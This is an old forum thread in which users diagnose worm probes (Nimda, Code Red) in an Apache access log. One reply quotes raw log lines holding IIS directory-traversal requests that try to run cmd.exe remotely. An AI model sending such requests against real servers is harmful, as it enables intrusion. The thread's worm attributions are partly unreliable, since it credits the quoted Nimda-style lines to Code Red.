Apache + hacking

Anon

Ive found some WIERD stuff in my access logs, theyre far to big here so ive cut out the relevant stuff and put it at

http://fearn.netfirms.com/strange.txt

Pls could some one take alook and tell me wtf was going on??

Anon

Err, can't access the file as your ISP prevents file access > 256K

It's likely that you're getting probed by a M$ machine with Nimda. You'll see a whole load of line relating to cmd.exe and a line with a whole heap of NNNNNNNNs.

Anon

Your link doesn't work. Should I assume it looks like this:

208.184.60.151 - - [21/Jan/2002:17:33:00 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 58
208.184.60.151 - - [21/Jan/2002:17:33:08 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 56
208.184.60.151 - - [21/Jan/2002:17:33:13 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 66
208.184.60.151 - - [21/Jan/2002:17:33:16 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 66
208.184.60.151 - - [21/Jan/2002:17:33:18 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 82
208.184.60.151 - - [21/Jan/2002:17:33:24 -0500] "GET /vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 103
208.184.60.151 - - [21/Jan/2002:17:33:28 -0500] "GET /mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 103
208.184.60.151 - - [21/Jan/2002:17:33:31 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 131
208.184.60.151 - - [21/Jan/2002:17:33:33 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 83
208.184.60.151 - - [21/Jan/2002:17:33:37 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 83

If I'm not mistaken, that's the Code Red Worm. It infects NT systems with IIS. So you probably don't need to worry if you're using Apache.

Anon

There are a couple variations of the code red worm that leave different entries in your apache logs. Typically for code red, since it is a buffer overrun exploit, you will see a very long string of characters at the end of an HTTP get request. The first version had a series of N's the second one has a series of X's.

As long as you are using Apache, you have no worries from this particular worm.

[deleted]

Probably at some stage, you had Apache configured to process proxy requests.

If i were you, i would disable that (and do something else instead of using Apache as a proxy) and i would also block those IP's from where the requests are coming.

HTH

Anon

i would also block those IP's from where the requests are coming.

It's a worm, not a hacker. Usually, the worm will try a server, then go on to the next one. Chances are, you'll never get any more hack attempts from that IP. You might get hundreds of requests from other addresses.

ziggs

Very true Ellery! Right on target.
Ziggs